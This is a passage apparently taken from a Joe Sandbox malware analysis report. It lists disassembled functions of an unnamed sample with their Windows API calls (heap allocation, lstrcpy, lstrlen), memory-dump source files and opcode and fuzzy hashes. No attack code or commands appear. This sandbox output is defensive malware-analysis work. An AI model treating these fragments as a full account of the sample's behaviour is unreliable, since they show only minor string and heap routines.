                        • Instruction Fuzzy Hash: 0D31E8727086184BF734DE6CE88096EFBE9FF99750B20492AF5418B6C1D771BC4183A4
                        Function 004F6EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,?), ref: 004F6F74
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F6F7B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID: @
                        • API String ID: 1357844191-2766056989
                        • Opcode ID: 6cc6abd02dba4995bec960dddf8c53537d97337db8a3ac9749a87a32fec34526
                        • Instruction ID: 8ee6b3f5db5cbfb0a69f5e6e898d31e924df18b82a92db5ef3f7480c31d65700
                        • Opcode Fuzzy Hash: 6cc6abd02dba4995bec960dddf8c53537d97337db8a3ac9749a87a32fec34526
                        • Instruction Fuzzy Hash: BA218EB06406069BEB209F20DC84BB773E8EB41705F44487DFA46CBA85FB79E945C764
                        Function 00512400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0051244C
                        • lstrlen.KERNEL32(00000000), ref: 005124E9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00512570
                        • lstrlen.KERNEL32(00000000), ref: 00512577
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 3bb5662b33041e0bc7e83ed39c55667211419a722b86a4caf135b7c5fc48a768
                        • Instruction ID: 511975979e7a24ebac083bda2ccb4bbcd747ef65c537e55db8d09c4ea9d50e9a
                        • Opcode Fuzzy Hash: 3bb5662b33041e0bc7e83ed39c55667211419a722b86a4caf135b7c5fc48a768
                        • Instruction Fuzzy Hash: 1681D670E002099BEF14DF95DC84BEEBBB5BF94300F14846DE508AB281EB759D96CB94
                        Function 00511570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 005115A1
                        • lstrcpy.KERNEL32(00000000,?), ref: 005115D9
                        • lstrcpy.KERNEL32(00000000,?), ref: 00511611
                        • lstrcpy.KERNEL32(00000000,?), ref: 00511649
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 20720430076b0dc6ac505b66c23749f108fbe65cd94dfc4d9aeae9ce191c4423
                        • Instruction ID: a8322c8cb30d2aaafa27affda2d9dcb226d0709f72378b1efa28e71328f35aa9
                        • Opcode Fuzzy Hash: 20720430076b0dc6ac505b66c23749f108fbe65cd94dfc4d9aeae9ce191c4423
                        • Instruction Fuzzy Hash: 55210AB4601F068BE734DF2AD558A27BBF9BF44700B04491DA58BC7A40DB78E851CF98
                        Function 004F1530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004F1610: lstrcpy.KERNEL32(00000000), ref: 004F162D
                          • Part of subcall function 004F1610: lstrcpy.KERNEL32(00000000,?), ref: 004F164F
                          • Part of subcall function 004F1610: lstrcpy.KERNEL32(00000000,?), ref: 004F1671
                          • Part of subcall function 004F1610: lstrcpy.KERNEL32(00000000,?), ref: 004F1693
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1557
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1579
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F159B
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F15FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 8770029d349340c3607b0c51d5a735f831ca93a6fd2195e385ccbca4ce9c75c5
                        • Instruction ID: f385d012b14b98ccbad2137956144d65deae69db89e7d058c1a115944856ff98
                        • Opcode Fuzzy Hash: 8770029d349340c3607b0c51d5a735f831ca93a6fd2195e385ccbca4ce9c75c5
                        • Instruction Fuzzy Hash: 3831B874A11B06EFD724DF3AC544967B7E5BF48305704492EA996C3B20DB78F811CB84
                        Function 004F1610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 004F162D
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F164F
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1671
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1693
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: ddd858d2cb4b1c13d9442a08108143b23a49583e9581b8420b2af990a957f93a
                        • Instruction ID: cd73b15521750254d5b8c449792e910c3b1af20a0e0d1db3260740ed0a27bffa
                        • Opcode Fuzzy Hash: ddd858d2cb4b1c13d9442a08108143b23a49583e9581b8420b2af990a957f93a
                        • Instruction Fuzzy Hash: 881151B4A117069BD7249F36D518937B7FCBF44301708452EA98AC3B60EB78E811CB58